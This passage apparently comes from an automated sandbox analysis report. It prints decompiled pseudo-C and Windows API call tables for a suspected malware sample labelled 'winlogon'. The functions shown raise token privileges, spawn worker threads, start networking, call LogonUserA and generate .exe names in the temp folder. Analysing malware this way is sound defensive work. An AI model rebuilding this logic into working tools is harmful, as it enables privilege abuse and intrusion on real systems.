						_v8 = 0;
						_t31 = GetTokenInformation(_t53, 3, 0, 0,  &_v8); // executed
						if(_t31 != 0) {
							goto L6;
						} else {
							_t32 = _v8;
							if(_t32 == 0) {
								goto L6;
							} else {
								_push(_t32);
								_t33 = E00D702C9(_t50);
								_t56 = _t33;
								if(_t56 != 0) {
									_t47 = 0;
									_t35 = GetTokenInformation(_t53, 3, _t56, _v8,  &_v8); // executed
									if(_t35 != 0) {
										_t49 = _a4;
										_t51 = 0;
										 *_t49 = 0;
										_t54 =  *_t56;
										if(_t54 != 0) {
											_t11 = _t56 + 4; // 0x4
											_t52 = _t11;
											while(_v16.LowPart !=  *_t52 ||  &_v16->HighPart !=  *((intOrPtr*)(_t52 + 4))) {
												_t51 = _t51 + 1;
												_t52 = _t52 + 0xc;
												if(_t51 < _t54) {
													continue;
												} else {
												}
												goto L20;
											}
											 *_t49 = (0 | ( *(_t56 + 0xc + (_t51 + _t51 * 2) * 4) & 0x00000003) != 0x00000000) + 1;
										}
										L20:
										_t47 = 1;
									}
									if(_t56 != 0xffffffff && _t56 != 0xcccccccc) {
										E00D7009A(_t56);
									}
									return _t47;
								} else {
									return _t33;
								}
							}
						}
					}
				} else {
					L6:
					return 0;
				}
			}

















    0x00d62a60
    0x00d62a67
    0x00d62a6b
    0x00d62a81
    0x00d62a7a
    0x00d62a7a
    0x00d62a7a
    0x00d62a83
    0x00d62a88
    0x00d62a8b
    0x00d62a9d
    0x00d62aa9
    0x00d62ab8
    0x00d62ac7
    0x00000000
    0x00d62ac9
    0x00d62acc
    0x00d62adb
    0x00d62ae3
    0x00000000
    0x00d62ae5
    0x00d62ae5
    0x00d62aea
    0x00000000
    0x00d62aec
    0x00d62aed
    0x00d62aee
    0x00d62af3
    0x00d62afa
    0x00d62b06
    0x00d62b10
    0x00d62b18
    0x00d62b1a
    0x00d62b1d
    0x00d62b1f
    0x00d62b25
    0x00d62b29
    0x00d62b2b
    0x00d62b2b
    0x00d62b30
    0x00d62b44
    0x00d62b45
    0x00d62b4a
    0x00000000
    0x00000000
    0x00d62b4c
    0x00000000
    0x00d62b4a
    0x00d62b5f
    0x00d62b5f
    0x00d62b61
    0x00d62b61
    0x00d62b61
    0x00d62b69
    0x00d62b74
    0x00d62b79
    0x00d62b84
    0x00d62afc
    0x00d62b01
    0x00d62b01
    0x00d62afa
    0x00d62aea
    0x00d62ae3
    0x00d62a9f
    0x00d62a9f
    0x00d62aa5
    0x00d62aa5

    APIs
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00D62ABF
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,FFFFFFFF), ref: 00D62ADB
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00D62B10
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D67680, Relevance: 7.6, APIs: 5, Instructions: 102thread

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 668 d67680-d6768d 669 d67696-d6769b 668->669 670 d6768f-d67695 668->670 669->670 671 d6769d-d676b3 call d702c9 669->671 674 d676b5-d676ba 671->674 675 d676bb-d676d4 call d6d520 671->675 678 d676d6-d67701 CreateEventA 675->678 679 d67751-d67771 WaitForMultipleObjects call d67cb0 675->679 681 d67703-d67708 678->681 682 d67772-d67789 call d67cb0 678->682 681->682 683 d6770a-d6770d 681->683 683->682 686 d6770f-d67749 CreateThread WaitForSingleObject CloseHandle 683->686 686->682 688 d6774b-d6774f 686->688 688->678 688->679
    C-Code - Quality: 87%
    			E00D67680(void __ecx) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				intOrPtr _v16;
				void* _v20;
				void _v24;
				void* __ebx;
				void* __edi;
				signed int _t25;
				intOrPtr _t27;
				void* _t33;
				void* _t38;
				long _t39;
				signed int _t42;
				void _t49;

				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x30)) != 0) {
					_t25 =  *(__ecx + 0x24);
					if(_t25 == 0) {
						goto L1;
					} else {
						_t51 = _t25 * 4;
						_push(_t25 * 4);
						_t27 = E00D702C9(__ecx);
						 *((intOrPtr*)(__ecx + 0x28)) = _t27;
						if(_t27 != 0) {
							E00D6D520(__ecx, _t27, 0, _t51);
							_t42 = 0;
							_v8 = 1;
							if( *(_t49 + 0x24) <= 0) {
								L11:
								WaitForMultipleObjects( *(_t49 + 0x24),  *(_t49 + 0x28), 1, 0xffffffff);
								E00D67CB0(_t42, _t49, _t49);
								return _v8;
							} else {
								while(1) {
									asm("xorps xmm0, xmm0");
									asm("movq [ebp-0x10], xmm0");
									_v12 = 0;
									_v24 = _t49;
									_v16 =  *((intOrPtr*)(_t49 + 0x34));
									_t33 = CreateEventA(0, 1, 0, 0);
									_v20 = _t33;
									if(_t33 == 0 || _t33 == 0xcccccccc || _t33 == 0xffffffff) {
										break;
									}
									_t38 = CreateThread(0, 0x100000, E00D67D40,  &_v24, 0,  &_v12); // executed
									( *(_t49 + 0x28))[_t42] = _t38;
									_t39 = WaitForSingleObject(_v20, 0xffffffff);
									CloseHandle(_v20);
									if(_t39 != 0) {
										break;
									} else {
										_t42 = _t42 + 1;
										if(_t42 <  *(_t49 + 0x24)) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_v8 = 0;
								E00D67CB0(_t42, _t49, _t49);
								return _v8;
							}
						} else {
							return _t27;
						}
					}
				} else {
					L1:
					return 0;
				}
				L13:
			}

















    0x00d67687
    0x00d6768d
    0x00d67696
    0x00d6769b
    0x00000000
    0x00d6769d
    0x00d6769e
    0x00d676a5
    0x00d676a6
    0x00d676ae
    0x00d676b3
    0x00d676c0
    0x00d676c5
    0x00d676c7
    0x00d676d4
    0x00d67751
    0x00d6775b
    0x00d67763
    0x00d67771
    0x00d676d6
    0x00d676d6
    0x00d676d9
    0x00d676e2
    0x00d676e9
    0x00d676f0
    0x00d676f3
    0x00d676f6
    0x00d676fc
    0x00d67701
    0x00000000
    0x00000000
    0x00d67725
    0x00d67730
    0x00d67736
    0x00d67741
    0x00d67749
    0x00000000
    0x00d6774b
    0x00d6774b
    0x00d6774f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d6774f
    0x00000000
    0x00d67749
    0x00d67774
    0x00d6777b
    0x00d67789
    0x00d67789
    0x00d676b5
    0x00d676ba
    0x00d676ba
    0x00d676b3
    0x00d6768f
    0x00d6768f
    0x00d67695
    0x00d67695
    0x00000000

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,?,?), ref: 00D676F6
    • CreateThread.KERNEL32(00000000,00100000,Function_00007D40,?,00000000,00000000), ref: 00D67725
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D67736
    • CloseHandle.KERNEL32(?), ref: 00D67741
    • WaitForMultipleObjects.KERNEL32(00000000,000007D0,00000001,000000FF), ref: 00D6775B
      • Part of subcall function 00D67CB0: TerminateThread.KERNEL32(?,00000001,00000000,?,?,00D67768,?,?,?,00000000,?,?,?,00D655C6), ref: 00D67CE9
      • Part of subcall function 00D67CB0: CloseHandle.KERNEL32(00000000), ref: 00D67CF1
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D67D40, Relevance: 7.6, APIs: 5, Instructions: 89sleep
    C-Code - Quality: 93%
    			E00D67D40(char _a4) {
				intOrPtr _v8;
				void* _v16;
				intOrPtr* _v20;
				char _t21;
				void* _t23;
				intOrPtr _t43;
				intOrPtr* _t46;
				intOrPtr* _t51;
				struct _CRITICAL_SECTION* _t57;
				void* _t58;
				void* _t59;

				_t21 = _a4;
				_t59 = _t58 - 0x10;
				if(_t21 != 0) {
					asm("movq xmm0, [eax]");
					asm("movq [ebp-0x10], xmm0");
					_v8 =  *((intOrPtr*)(_t21 + 8));
					_t23 = _v16;
					if(_t23 != 0 && _t23 != 0xcccccccc && _t23 != 0xffffffff) {
						SetEvent(_t23);
					}
					_t51 = _v20;
					while(1) {
						_t43 =  *((intOrPtr*)(_t51 + 0x2c));
						if(_t43 == 0 && ( *((intOrPtr*)(_t51 + 4)) -  *_t51 & 0xfffffffc) == 0) {
							break;
						}
						_t46 =  *_t51;
						_a4 = 0;
						if( *((intOrPtr*)(_t51 + 4)) - _t46 >> 2 == 0) {
							if(_t43 == 0) {
								return 1;
							} else {
								Sleep(0x64);
								continue;
							}
						} else {
							_t57 = _t51 + 0xc;
							_a4 =  *_t46;
							EnterCriticalSection(_t57);
							_t15 =  *_t51 + 4; // 0x4
							E00D6BCB0( *_t51, _t15,  *((intOrPtr*)(_t51 + 4)) - _t15);
							 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) + 0xfffffffc;
							_t59 = _t59 + 0xc;
							LeaveCriticalSection(_t57);
							 *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x30))))( &_a4, _v8); // executed
							Sleep(0x64);
							continue;
						}
						goto L15;
					}
					return 0;
				} else {
					return 1;
				}
				L15:
			}














    0x00d67d43
    0x00d67d46
    0x00d67d4b
    0x00d67d58
    0x00d67d5f
    0x00d67d64
    0x00d67d67
    0x00d67d6c
    0x00d67d7b
    0x00d67d7b
    0x00d67d8a
    0x00d67d90
    0x00d67d90
    0x00d67d95
    0x00000000
    0x00000000
    0x00d67da6
    0x00d67dad
    0x00d67db6
    0x00d67dfb
    0x00d67e10
    0x00d67dfd
    0x00d67dff
    0x00000000
    0x00d67dff
    0x00d67db8
    0x00d67dba
    0x00d67dbe
    0x00d67dc1
    0x00d67dcc
    0x00d67dd4
    0x00d67dd9
    0x00d67ddd
    0x00d67de1
    0x00d67df1
    0x00d67df5
    0x00000000
    0x00d67df5
    0x00000000
    0x00d67db6
    0x00d67e1d
    0x00d67d4d
    0x00d67d55
    0x00d67d55
    0x00000000

    APIs
    • SetEvent.KERNEL32(?), ref: 00D67D7B
    • EnterCriticalSection.KERNEL32(?), ref: 00D67DC1
    • LeaveCriticalSection.KERNEL32(?), ref: 00D67DE1
    • Sleep.KERNEL32(00000064), ref: 00D67DF5
    • Sleep.KERNEL32(00000064), ref: 00D67DFF
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D66500, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160network
    C-Code - Quality: 51%
    			E00D66500(int __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				signed int _v24;
				signed int _v44;
				char _v1036;
				char _v1068;
				short _v2060;
				void* _t31;
				void* _t33;
				void* _t35;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				long _t61;
				intOrPtr _t62;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t78;
				void* _t79;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				signed int _t99;
				signed int _t104;
				signed int _t106;
				intOrPtr* _t109;
				signed int _t112;
				void* _t114;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				signed int _t125;
				void* _t127;
				void* _t128;
				signed int _t129;
				signed int _t131;
				void* _t134;

				_t73 = __ebx;
				_t109 = __ecx; // executed
				_t31 = E00D70058(__ecx, __edx, __eflags, 0); // executed
				E00D6E328(__ecx, _t31);
				_t128 = _t127 + 8;
				_t33 = __ecx + 0x24;
				__imp__#115(0x202, _t33, __edi); // executed
				if(_t33 == 0) {
					_push(__esi);
					_t129 = _t128 - 8;
					E00D62340(__ebx, __ecx, __ecx, __esi); // executed
					_t35 = 0;
					_t118 =  *((intOrPtr*)(__ecx + 4)) -  *__ecx;
					_t97 = _t118 >> 9;
					__eflags = _t97;
					if(_t97 == 0) {
						L7:
						GetModuleFileNameA(GetModuleHandleA(0), _t109 + 0xdb4, 0x3ff); // executed
						E00D62B90(_t73, _t109, _t118); // executed
						E00D660F0(_t73, _t109, _t109, _t118); // executed
						return 1;
					} else {
						do {
							__eflags = _t35 - 0xffffff;
							if(_t35 > 0xffffff) {
								goto L6;
							} else {
								_t78 = _t118 >> 9;
								__eflags = _t35 - _t78;
								if(_t35 >= _t78) {
									goto L6;
								} else {
									__eflags = _t97 - _t35;
									if(_t97 <= _t35) {
										E00D6B97B("invalid vector<T> subscript");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t123 = _t129;
										_t131 = (_t129 & 0xfffffff8) - 8;
										_push(_t118);
										_t120 = _t78;
										_push(_t109);
										__eflags =  *(_t120 + 0x15c8);
										if( *(_t120 + 0x15c8) != 0) {
											_v24 = 0;
											_t67 = E00D63230(_t73, 0x65, _t109, _t120, _t78,  &_v24); // executed
											_t131 = _t131 + 8;
											__eflags = _t67;
											if(_t67 != 0) {
												_t106 = _v24;
												__eflags = _t106;
												if(_t106 != 0) {
													_t91 = _t106;
													_t109 = _t91 + 2;
													do {
														_t68 =  *_t91;
														_t91 = _t91 + 2;
														__eflags = _t68;
													} while (_t68 != 0);
													_t92 = _t91 - _t109;
													__eflags = _t92;
													if(_t92 != 0) {
														E00D63920(_t73, _t120, _t120 + 0x13b4, _t109, _t120, _t120 + 0x11b4, _t120 + 0x12b4, _t106);
														_t131 = _t131 + 0xc;
													}
												}
											}
										}
										__eflags =  *(_t120 + 0x15c0);
										if( *(_t120 + 0x15c0) != 0) {
											_t62 =  *((intOrPtr*)(_t120 + 0x15b4));
											__eflags = _t62 - 0x20;
											if(_t62 == 0x20) {
												L19:
												_v24 = 0;
												__eflags = _t62 - 0x20;
												_t63 = E00D63230(_t73, (0 | _t62 != 0x00000020) + 0x66, _t109, _t120,  &_v24,  &_v24); // executed
												_t131 = _t131 + 8;
												__eflags = _t63;
												if(_t63 != 0) {
													_t104 = _v24;
													__eflags = _t104;
													if(_t104 != 0) {
														_t87 = _t104;
														_t114 = _t87 + 2;
														do {
															_t64 =  *_t87;
															_t87 = _t87 + 2;
															__eflags = _t64;
														} while (_t64 != 0);
														_t88 = _t87 - _t114;
														__eflags = _t88;
														if(_t88 != 0) {
															E00D63B90(_t73, _t120, _t104, _t114, _t120);
														}
													}
												}
											} else {
												__eflags = _t62 - 0x40;
												if(_t62 == 0x40) {
													goto L19;
												}
											}
										}
										_t79 = 0;
										_t112 =  *((intOrPtr*)(_t120 + 4)) -  *_t120;
										_t99 = _t112 >> 9;
										__eflags = _t99;
										if(_t99 == 0) {
											L30:
											return 1;
										} else {
											do {
												__eflags = _t79 - 0xffffff;
												if(_t79 > 0xffffff) {
													goto L29;
												} else {
													__eflags = _t79 - _t112 >> 9;
													if(_t79 >= _t112 >> 9) {
														goto L29;
													} else {
														__eflags = _t99 - _t79;
														if(_t99 <= _t79) {
															E00D6B97B("invalid vector<T> subscript");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t123);
															_t125 = _t131;
															_t47 =  *0xd88004; // 0x276b9783
															_v44 = _t47 ^ _t125;
															E00D6D520(_t112,  &_v1068, 0, 0x400);
															_t134 = _t131 - 0x804 + 0xc;
															_t51 = E00D65770(_t73,  &_v1068, _t112, _t120); // executed
															__eflags = _t51;
															if(__eflags != 0) {
																_t61 = GetFileAttributesA( &_v1036); // executed
																__eflags = _t61 - 0xffffffff;
																__eflags = 0 | _t61 != 0xffffffff;
																if(__eflags != 0) {
																	L34:
																	E00D6D520(_t112,  &_v2060, 0, 0x800);
																	_t134 = _t134 + 0xc;
																	GetModuleFileNameW(GetModuleHandleW(0),  &_v2060, 0x3ff);
																	E00D65DD0(_t73, 0x1388,  &_v2060, _t112, _t120);
																	ExitProcess(0); // executed
																}
															}
															_t52 = E00D65C20(_t73, _t112, _t120, __eflags); // executed
															__eflags = _t52;
															if(_t52 != 0) {
																goto L34;
															}
															__eflags = _v12 ^ _t125;
															return E00D6ABE4(_v12 ^ _t125);
														} else {
															goto L29;
														}
													}
												}
												goto L37;
												L29:
												_t79 = _t79 + 1;
												__eflags = _t79 - _t99;
											} while (_t79 < _t99);
											goto L30;
										}
									} else {
										goto L6;
									}
								}
							}
							goto L37;
							L6:
							_t35 = _t35 + 1;
							__eflags = _t35 - _t97;
						} while (_t35 < _t97);
						goto L7;
					}
				} else {
					return 0;
				}
				L37:
			}











































    0x00d66500
    0x00d66503
    0x00d66505
    0x00d6650b
    0x00d66510
    0x00d66513
    0x00d6651c
    0x00d66524
    0x00d6652a
    0x00d6652b
    0x00d66530
    0x00d66538
    0x00d6653a
    0x00d6653e
    0x00d66541
    0x00d66543
    0x00d6655e
    0x00d66573
    0x00d66579
    0x00d66580
    0x00d6658c
    0x00d66545
    0x00d66545
    0x00d66545
    0x00d6654a
    0x00000000
    0x00d6654c
    0x00d6654e
    0x00d66551
    0x00d66553
    0x00000000
    0x00d66555
    0x00d66555
    0x00d66557
    0x00d66592
    0x00d66597
    0x00d66598
    0x00d66599
    0x00d6659a
    0x00d6659b
    0x00d6659c
    0x00d6659d
    0x00d6659e
    0x00d6659f
    0x00d665a1
    0x00d665a6
    0x00d665a9
    0x00d665aa
    0x00d665ac
    0x00d665ad
    0x00d665b4
    0x00d665ba
    0x00d665c9
    0x00d665ce
    0x00d665d1
    0x00d665d3
    0x00d665d5
    0x00d665d9
    0x00d665db
    0x00d665dd
    0x00d665df
    0x00d665e2
    0x00d665e2
    0x00d665e5
    0x00d665e8
    0x00d665e8
    0x00d665ed
    0x00d665ed
    0x00d665f1
    0x00d6660a
    0x00d6660f
    0x00d6660f
    0x00d665f1
    0x00d665db
    0x00d665d3
    0x00d66612
    0x00d66619
    0x00d6661b
    0x00d66621
    0x00d66624
    0x00d6662b
    0x00d6662d
    0x00d66639
    0x00d66644
    0x00d66649
    0x00d6664c
    0x00d6664e
    0x00d66650
    0x00d66654
    0x00d66656
    0x00d66658
    0x00d6665a
    0x00d66660
    0x00d66660
    0x00d66663
    0x00d66666
    0x00d66666
    0x00d6666b
    0x00d6666b
    0x00d6666f
    0x00d66673
    0x00d66673
    0x00d6666f
    0x00d66656
    0x00d66626
    0x00d66626
    0x00d66629
    0x00000000
    0x00000000
    0x00d66629
    0x00d66624
    0x00d6667b
    0x00d6667d
    0x00d66681
    0x00d66684
    0x00d66686
    0x00d666a2
    0x00d666ac
    0x00d66688
    0x00d66688
    0x00d66688
    0x00d6668e
    0x00000000
    0x00d66690
    0x00d66695
    0x00d66697
    0x00000000
    0x00d66699
    0x00d66699
    0x00d6669b
    0x00d666b2
    0x00d666b7
    0x00d666b8
    0x00d666b9
    0x00d666ba
    0x00d666bb
    0x00d666bc
    0x00d666bd
    0x00d666be
    0x00d666bf
    0x00d666c0
    0x00d666c1
    0x00d666c9
    0x00d666d0
    0x00d666e1
    0x00d666e6
    0x00d666ef
    0x00d666f4
    0x00d666f6
    0x00d666ff
    0x00d66707
    0x00d6670d
    0x00d6670f
    0x00d66711
    0x00d6671f
    0x00d66724
    0x00d6673c
    0x00d6674d
    0x00d66754
    0x00d66754
    0x00d6670f
    0x00d6675a
    0x00d6675f
    0x00d66761
    0x00000000
    0x00000000
    0x00d66766
    0x00d66770
    0x00000000
    0x00000000
    0x00000000
    0x00d6669b
    0x00d66697
    0x00000000
    0x00d6669d
    0x00d6669d
    0x00d6669e
    0x00d6669e
    0x00000000
    0x00d66688
    0x00000000
    0x00000000
    0x00000000
    0x00d66557
    0x00d66553
    0x00000000
    0x00d66559
    0x00d66559
    0x00d6655a
    0x00d6655a
    0x00000000
    0x00d66545
    0x00d66526
    0x00d66529
    0x00d66529
    0x00000000

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 00D6651C
    • GetModuleHandleA.KERNEL32(00000000,?,000003FF,?,00000000), ref: 00D6656C
    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00D66573
      • Part of subcall function 00D62B90: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00D62BC1
      • Part of subcall function 00D62B90: OpenProcessToken.ADVAPI32(00000000), ref: 00D62BC8
      • Part of subcall function 00D62B90: GetTokenInformation.KERNELBASE(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62C00
      • Part of subcall function 00D62B90: GetTokenInformation.KERNELBASE(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 00D62C30
      • Part of subcall function 00D62B90: LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00D62C79
      • Part of subcall function 00D62B90: AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,00000010,00000000,00000000), ref: 00D62CDA
      • Part of subcall function 00D62B90: CloseHandle.KERNEL32(FFFFFFFF), ref: 00D62D04
      • Part of subcall function 00D660F0: GetVersionExW.KERNEL32(00000114), ref: 00D66145
      • Part of subcall function 00D660F0: GetVersionExW.KERNEL32(00000114), ref: 00D66188
      • Part of subcall function 00D660F0: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D661A8
      • Part of subcall function 00D660F0: GetProcAddress.KERNEL32(00000000), ref: 00D661AF
      • Part of subcall function 00D660F0: GetCurrentProcess.KERNEL32(?), ref: 00D661D1
      • Part of subcall function 00D660F0: IsWow64Process.KERNELBASE(00000000), ref: 00D661D8
      • Part of subcall function 00D660F0: __Stoull.NTSTC_LIBCMT ref: 00D6622B
      • Part of subcall function 00D660F0: __Stoull.NTSTC_LIBCMT ref: 00D66242
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
      • Part of subcall function 00D63920: LogonUserA.ADVAPI32(?,?,?,00000003,00000000,?), ref: 00D63A3C
      • Part of subcall function 00D63920: GetLastError.KERNEL32(?,00000003,00000000,?,276B9783), ref: 00D63A48
      • Part of subcall function 00D63920: DeleteCriticalSection.KERNEL32(?,276B9783), ref: 00D63B4A
      • Part of subcall function 00D63230: CoCreateGuid.OLE32(?), ref: 00D633BF
      • Part of subcall function 00D63230: wsprintfW.USER32 ref: 00D6342A
      • Part of subcall function 00D63230: wsprintfW.USER32 ref: 00D6345D
      • Part of subcall function 00D63B90: InitializeCriticalSection.KERNEL32(?,276B9783), ref: 00D63BFD
      • Part of subcall function 00D63B90: DeleteCriticalSection.KERNEL32(?), ref: 00D63D5D
    Strings
    • invalid vector<T> subscript, xrefs: 00D6658D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D63DA0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138
    C-Code - Quality: 76%
    			E00D63DA0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v1032;
				CHAR* _v1036;
				signed int _t30;
				intOrPtr _t36;
				intOrPtr _t37;
				short _t38;
				intOrPtr _t39;
				intOrPtr* _t44;
				long _t46;
				void _t47;
				void _t48;
				intOrPtr _t55;
				short _t56;
				void* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t68;
				char _t69;
				char _t70;
				signed int _t72;
				void* _t83;
				void* _t84;
				void* _t86;
				signed int _t87;
				void* _t88;
				short* _t90;
				void* _t91;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				signed int _t106;

				_t101 = __esi;
				_t88 = __edi;
				_t30 =  *0xd88004; // 0x276b9783
				_v8 = _t30 ^ _t106;
				_t60 = __ecx;
				if(__ecx != 0) {
					E00D6D520(__edi,  &_v1032, 0, 0x400);
					GetTempPathA(0x300,  &_v1032);
					_t63 =  &_v1032;
					_t83 = _t63 + 1;
					do {
						_t36 =  *_t63;
						_t63 = _t63 + 1;
					} while (_t36 != 0);
					_push(_t88);
					if( *((char*)(_t106 + _t63 - _t83 - 0x405)) != 0x5c) {
						_t100 =  &_v1032 - 1;
						do {
							_t55 =  *((intOrPtr*)(_t100 + 1));
							_t100 = _t100 + 1;
						} while (_t55 != 0);
						_t56 = "\\"; // 0x5c
						 *_t100 = _t56;
					}
					_t90 =  &_v1032 - 1;
					asm("o16 nop [eax+eax]");
					do {
						_t37 =  *((intOrPtr*)(_t90 + 1));
						_t90 = _t90 + 1;
					} while (_t37 != 0);
					_t38 = "_"; // 0x5f
					_t65 =  &_v1032;
					 *_t90 = _t38;
					_t84 = _t65 + 1;
					do {
						_t39 =  *_t65;
						_t65 = _t65 + 1;
					} while (_t39 != 0);
					_t41 =  &(( &_v1032)[_t65 - _t84]);
					_t91 = 3;
					_v1036 =  &(( &_v1032)[_t65 - _t84]);
					_push(_t101);
					do {
						_t102 = 0;
						do {
							E00D64140(_t41, _t91, _t102); // executed
							_t44 =  &_v1032 - 1;
							do {
								_t68 =  *((intOrPtr*)(_t44 + 1));
								_t44 = _t44 + 1;
							} while (_t68 != 0);
							_t69 = ".exe"; // 0x6578652e
							 *_t44 = _t69;
							_t70 =  *0xd84c14; // 0x0
							 *((char*)(_t44 + 4)) = _t70;
							_t46 = GetFileAttributesA( &_v1032); // executed
							if(_t46 == 0xffffffff) {
								_t86 =  &_v1032;
								_t103 = _t86;
								do {
									_t47 =  *_t86;
									_t86 = _t86 + 1;
								} while (_t47 != 0);
								_t87 = _t86 - _t103;
								_t61 = _t60 - 1;
								asm("o16 nop [eax+eax]");
								do {
									_t48 =  *(_t61 + 1);
									_t61 = _t61 + 1;
								} while (_t48 != 0);
								_t72 = _t87 >> 2;
								memcpy(_t61, _t103, _t72 << 2);
								memcpy(_t103 + _t72 + _t72, _t103, _t87 & 0x00000003);
								return E00D6ABE4(_v8 ^ _t106);
							} else {
								goto L17;
							}
							goto L25;
							L17:
							_t41 = _v1036;
							_t102 = _t102 + 1;
						} while (_t102 < 0x100);
						_t91 = _t91 + 1;
					} while (_t91 <= 6);
					return E00D6ABE4(_v8 ^ _t106);
				} else {
					return E00D6ABE4(_v8 ^ _t106);
				}
				L25:
			}





































    0x00d63da0
    0x00d63da0
    0x00d63da9
    0x00d63db0
    0x00d63db4
    0x00d63db8
    0x00d63dd9
    0x00d63ded
    0x00d63df3
    0x00d63df9
    0x00d63e00
    0x00d63e00
    0x00d63e02
    0x00d63e03
    0x00d63e09
    0x00d63e12
    0x00d63e1a
    0x00d63e20
    0x00d63e20
    0x00d63e23
    0x00d63e26
    0x00d63e2a
    0x00d63e30
    0x00d63e30
    0x00d63e39
    0x00d63e3a
    0x00d63e40
    0x00d63e40
    0x00d63e43
    0x00d63e46
    0x00d63e4a
    0x00d63e50
    0x00d63e56
    0x00d63e59
    0x00d63e60
    0x00d63e60
    0x00d63e62
    0x00d63e63
    0x00d63e6f
    0x00d63e71
    0x00d63e76
    0x00d63e7c
    0x00d63e80
    0x00d63e80
    0x00d63e82
    0x00d63e86
    0x00d63e91
    0x00d63e92
    0x00d63e92
    0x00d63e95
    0x00d63e98
    0x00d63e9c
    0x00d63ea2
    0x00d63ea4
    0x00d63eaa
    0x00d63eb4
    0x00d63ebd
    0x00d63ee7
    0x00d63eed
    0x00d63ef0
    0x00d63ef0
    0x00d63ef2
    0x00d63ef3
    0x00d63ef7
    0x00d63ef9
    0x00d63efa
    0x00d63f00
    0x00d63f00
    0x00d63f03
    0x00d63f04
    0x00d63f0c
    0x00d63f14
    0x00d63f1b
    0x00d63f2d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d63ebf
    0x00d63ebf
    0x00d63ec5
    0x00d63ec6
    0x00d63ece
    0x00d63ecf
    0x00d63ee6
    0x00d63dba
    0x00d63dca
    0x00d63dca
    0x00000000

